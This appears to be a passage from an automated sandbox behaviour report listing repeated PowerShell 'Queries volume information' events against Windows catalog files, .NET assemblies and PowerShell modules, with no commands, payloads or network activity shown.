Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
